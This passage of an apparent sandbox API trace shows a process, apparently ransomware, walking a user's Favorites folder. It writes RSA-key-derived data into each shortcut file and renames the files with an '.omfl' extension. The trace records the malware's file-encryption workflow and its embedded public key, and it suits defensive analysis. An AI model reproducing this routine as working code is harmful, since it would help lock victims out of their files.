returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.770] WriteFile (in: hFile=0x610, lpBuffer=0xdd14728*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd14728*, lpNumberOfBytesWritten=0xe00fb14*=0x80, lpOverlapped=0x0) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.770] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.770] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.770] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.770] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.771] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.771] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.771] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.771] CloseHandle (hObject=0x610) returned 1 [0132.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.773] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x74fb288 [0132.773] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.773] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.omfl")) returned 1 [0132.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.774] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.774] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0132.775] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0132.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf9a0 [0132.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.775] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0132.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.823] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.823] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.827] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.827] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.828] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.828] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.828] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.829] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.829] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.830] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.830] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.830] GetLastError () returned 0x0 [0132.830] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.830] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.830] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.830] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.830] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.830] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd90 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174a8 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbdd8 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174f0 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17508 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.831] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0132.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17508 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd174f0 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.848] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.848] GetCurrentThreadId () returned 0x618 [0132.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579ef0 [0132.848] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.849] GetCurrentThreadId () returned 0x618 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174f0 [0132.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17508 [0132.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174d8 [0132.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.850] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17520 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174f0 [0132.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174f0 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: 